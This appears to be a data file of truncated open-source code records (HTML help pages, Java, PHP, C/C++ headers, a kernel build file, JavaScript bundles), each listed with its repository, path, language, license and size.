<html> <head> <title>Das SpeedCrunch-Buch</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <link rel="stylesheet" type="text/css" href="../books.css" /> </head> <body align="left"> <h1>3D-Objekte</h1><br /> <a href="sphere.html">Kugel</a><br /> <a href="cube.html...
ruphy/speedcrunch
src/books/de/math_index.html
HTML
gpl-2.0
737
<!-- --- UCSF Chimera Copyright --- Copyright (c) 2000-2009 Regents of the University of California. All rights reserved. This software provided pursuant to a license agreement containing restrictions on its disclosure, duplication and use. This notice must be embedded in or attached to all copies, including partial ...
platinhom/ManualHom
Visualization/Chimera/1.10/helpdir/UsersGuide/midas/TOCatom_spec.html
HTML
gpl-2.0
1,770
<!DOCTYPE html> <html> <!-- Mirrored from www.w3schools.com/jsref/tryjsref_event_key_key_if.htm by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:38:21 GMT --> <body> <p>Press the "A" key on the keyboard in the input field to alert some text.</p> <input type="text" size="40" onkeydown="myFunction(event...
platinhom/ManualHom
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/jsref/tryjsref_event_key_key_if.html
HTML
gpl-2.0
853
package pub.infoclass.pushservice; public class ACK { private int p = h_protocol_pusher.ACK; private String UserID; private String PushID; public ACK(String userID, String pushID) { super(); UserID = userID; PushID = pushID; } public int getP() { return p; } public void setP(int p) { this.p = p; ...
282857484/LocationBaseServiceSocialNetworking
src/pub/infoclass/pushservice/ACK.java
Java
gpl-2.0
551
cmd_fs/yaffs2/yaffs_guts.o := arm-eabi-gcc -Wp,-MD,fs/yaffs2/.yaffs_guts.o.d -nostdinc -isystem /usr/bin/../lib/gcc/arm-eabi/4.5.0/include -Iinclude -I/home/jacob/source/wildfire-kernel/arch/arm/include -include include/linux/autoconf.h -D__KERNEL__ -mlittle-endian -Iarch/arm/mach-msm/include -Wall -Wundef -Wstrict-p...
HCDRJacob/wildfire-kernel
fs/yaffs2/.yaffs_guts.o.cmd
Batchfile
gpl-2.0
148,468
<?php /* * * Ampoliros Application Server * * http://www.ampoliros.com * * * * Copyright (C) 2000-2004 Solarix * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the...
alexpagnoni/ampoliros
var/classes/com/solarix/ampoliros/db/drivers/mysql/DBLayer_mysql.php
PHP
gpl-2.0
7,888
/* * This file is part of the KDE project * * Copyright (c) 2005 Michael Thaler <michael.thaler@physik.tu-muenchen.de> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version ...
wyuka/calligra
krita/plugins/extensions/dropshadow/kis_dropshadow_plugin.cc
C++
gpl-2.0
3,316
#ifndef QGSSYMBOLLAYERV2WIDGET_H #define QGSSYMBOLLAYERV2WIDGET_H #include <QWidget> class QgsSymbolLayerV2; class GUI_EXPORT QgsSymbolLayerV2Widget : public QWidget { Q_OBJECT public: QgsSymbolLayerV2Widget( QWidget* parent ) : QWidget( parent ) {} virtual ~QgsSymbolLayerV2Widget() {} virtual ...
sourcepole/qgis
qgis/src/gui/symbology-ng/qgssymbollayerv2widget.h
C
gpl-2.0
6,671
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <script src="js/jquery.min.js"></script> <script type="text/javascript" src="js/js.cookie.js"></script> <title>BenchmarkTest00085<...
ganncamp/Benchmark
src/main/webapp/BenchmarkTest00085.html
HTML
gpl-2.0
1,917
/** -*- c++ -*- * Copyright (C) 2011 Hypertable, Inc. * * This file is part of Hypertable. * * Hypertable is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; version 2 of the * License, or any later versio...
sjhalaz/hypertable
src/cc/Hypertable/RangeServer/ReplayDispatchHandler.h
C
gpl-2.0
2,502
/* * To change this license header, choose License Headers in Project Properties. * To change this template file, choose Tools | Templates * and open the template in the editor. */ package cn.edu.hfut.dmic.webcollectorcluster.generator; import cn.edu.hfut.dmic.webcollectorcluster.model.CrawlDatum; import java.io....
CrawlScript/WebCollectorCluster-Dev
WebCollectorCluster/src/main/java/cn/edu/hfut/dmic/webcollectorcluster/generator/RecordGenerator.java
Java
gpl-2.0
1,060
/* * INET An implementation of the TCP/IP protocol suite for the LINUX * operating system. INET is implemented using the BSD Socket * interface as the means of communication with the user level. * * RAW - implementation of IP "raw" sockets. * * Version: $Id: raw.c,v 1.1.1.1 2010/03/11 21:07:21 kris Exp $ ...
fgoncalves/Modified-TS7500-Kernel
net/ipv4/raw.c
C
gpl-2.0
21,670
/* * NimBLERemoteDescriptor.cpp * * Created: on Jan 27 2020 * Author H2zero * * Originally: * * BLERemoteDescriptor.cpp * * Created on: Jul 8, 2017 * Author: kolban */ #include "sdkconfig.h" #if defined(CONFIG_BT_ENABLED) #include "nimconfig.h" #if defined( CONFIG_BT_NIMBLE_ROLE_CENTRAL) #incl...
ramalhais/code
arduino/libraries/NimBLE-Arduino/src/NimBLERemoteDescriptor.cpp
C++
gpl-2.0
10,911
<?php /* core/themes/stable/templates/admin/admin-block.html.twig */ class __TwigTemplate_73d94355d598b4dfa4b4ca02e16e4343556a0d714799515056c444f65791e3fc extends Twig_Template { public function __construct(Twig_Environment $env) { parent::__construct($env); $this->parent = false; $th...
neetumorwani/dcon
sites/default/files/php/twig/e7e9cf99_admin-block.html.twig_b440e57db9efed76852fc563c6827050f943bfd78965a8b1ecb3a02c71db4383/d60b7a51460832b200c45935652984dcb99b21f7bda17e389af5047f446ab118.php
PHP
gpl-2.0
4,309
/******/ (function(modules) { // webpackBootstrap /******/ // The module cache /******/ var installedModules = {}; /******/ /******/ // The require function /******/ function __webpack_require__(moduleId) { /******/ /******/ // Check if module is in cache /******/ if(installedModules[moduleId]) { /******/ re...
appqian/vue
src/index.js
JavaScript
gpl-2.0
390,912
contao_isotope_installer ======================== A set of tools to quickly install some of the basics for an Isotope eCommerce System.
hb-agency/contao_isotope_installer
README.md
Markdown
gpl-2.0
137
#ifndef _LINUX_RANDOM_H #define _LINUX_RANDOM_H #include <linux/types.h> #include <linux/ioctl.h> #include <linux/irqnr.h> #define RNDGETENTCNT _IOR( 'R', 0x00, int ) #define RNDADDTOENTCNT _IOW( 'R', 0x01, int ) #define RNDGETPOOL _IOR( 'R', 0x02, int [2] ) #define RNDADDENTROPY _IOW( 'R', 0x03, int [2] )...
leemgs/OptimusOneKernel-KandroidCommunity
include/linux/random.h
C
gpl-2.0
1,619
/* Simple DirectMedia Layer Copyright (C) 1997-2012 Sam Lantinga <slouken@libsdl.org> This software is provided 'as-is', without any express or implied warranty. In no event will the authors be held liable for any damages arising from the use of this software. Permission is granted to anyone to use this ...
ashishlal/pjproject-2.0.1
third_party/sdl/src/video/cocoa/SDL_cocoawindow.h
C
gpl-2.0
4,577